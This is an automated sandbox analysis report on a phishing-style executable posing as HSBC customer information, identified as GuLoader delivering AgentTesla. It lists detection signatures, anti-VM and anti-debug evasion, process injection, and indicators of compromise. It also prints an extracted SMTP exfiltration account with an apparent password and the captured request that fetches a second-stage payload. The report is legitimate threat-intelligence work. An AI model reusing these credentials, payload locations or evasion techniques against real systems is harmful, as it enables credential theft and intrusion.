Windows Analysis Report HSBC Customer Information.exe

Overview

General Information

Sample Name: HSBC Customer Information.exe
Analysis ID: 483511
MD5: 448f83467c61e465162daf7cf8d9e88f
SHA1: c627061336905606c2c26b2b460ac4246fd54ca5
SHA256: 4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
Tags: exe
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: HSBC Customer Information.exe.6392.0.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}
Multi AV Scanner detection for submitted file
Source: HSBC Customer Information.exe Virustotal: Detection: 25% Perma Link
Source: HSBC Customer Information.exe ReversingLabs: Detection: 20%
Machine Learning detection for sample
Source: HSBC Customer Information.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: HSBC Customer Information.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp String found in binary or memory: http://cthUYD.com
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.bin
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: qrextechnologies.com
Source: global traffic HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: HSBC Customer Information.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_004017AC 0_2_004017AC
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_0224282A 0_2_0224282A
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_022428A3 0_2_022428A3
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02245CAF 0_2_02245CAF
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_022406C3 0_2_022406C3
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02240ED2 0_2_02240ED2
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02240F34 0_2_02240F34
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02240702 0_2_02240702
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_0224651E 0_2_0224651E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 25_2_1DD747A0 25_2_1DD747A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 25_2_1DD74790 25_2_1DD74790
Contains functionality to call native functions
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02245CAF NtAllocateVirtualMemory, 0_2_02245CAF
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: HSBC Customer Information.exe, 00000000.00000000.208413125.000000000041D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe
Source: HSBC Customer Information.exe Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe
PE file contains strange resources
Source: HSBC Customer Information.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: HSBC Customer Information.exe Virustotal: Detection: 25%
Source: HSBC Customer Information.exe ReversingLabs: Detection: 20%
Source: HSBC Customer Information.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\HSBC Customer Information.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_00407D36 push 0000000Fh; ret 0_2_00407D56
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_004059AE push ecx; ret 0_2_004059AF
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02241E3C push esp; ret 0_2_02241E9D
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_0224460E push ebp; iretd 0_2_022446A9
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02244412 push esp; retf 0_2_02244413
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_0224301F push ebx; iretd 0_2_02243026
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02240A5C push esi; retf 0_2_02240A5D
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_022446B5 push ebp; iretd 0_2_022446A9
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02242D18 push ebx; iretd 0_2_02242D52
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02246B6D push ecx; retf 0_2_02246B6E
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_022441BE push ebx; iretd 0_2_0224435E
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02241F89 push 0000001Dh; ret 0_2_02241F8B
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_02244192 push ebx; iretd 0_2_0224435E
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_022467E2 pushad ; retf 0_2_022467F1
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Code function: 0_2_022445F1 push ebp; iretd 0_2_022446A9
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\HSBC Customer Information.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\HSBC Customer Information.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://QREXTECHNOLOGIES.COM/BARRR09_HVPBNJRE68.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\HSBC Customer Information.exe RDTSC instruction interceptor: First address: 000000000040BC41 second address: 000000000040BC41 instructions: 0x00000000 rdtsc 0x00000002 cmp edx, 000000F3h 0x00000008 xor eax, edx 0x0000000a cmp cx, 00E8h 0x0000000f dec edi 0x00000010 cmp bx, 00DDh 0x00000015 fabs 0x00000017 jmp 00007FC36C4BB470h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FC36C4BB393h 0x00000022 cmp si, 00BBh 0x00000027 mov ebx, F06F76B6h 0x0000002c cmp dh, FFFFFFACh 0x0000002f sub ebx, 2716C148h 0x00000035 cmp ebx, 24h 0x00000038 xor ebx, 6F5BB001h 0x0000003e cmp di, 0030h 0x00000042 punpckldq mm1, mm7 0x00000045 jmp 00007FC36C4BB474h 0x00000047 xor ebx, A643056Fh 0x0000004d cmp ah, 00000026h 0x00000050 cmp cl, FFFFFF90h 0x00000053 rdtsc
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4332 Thread sleep time: -26747778906878833s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Window / User API: threadDelayed 684 Jump to behavior
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Window / User API: threadDelayed 9316 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9139 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 685 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\HSBC Customer Information.exe System information queried: ModuleInformation Jump to behavior
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1000000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\HSBC Customer Information.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe' Jump to behavior
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
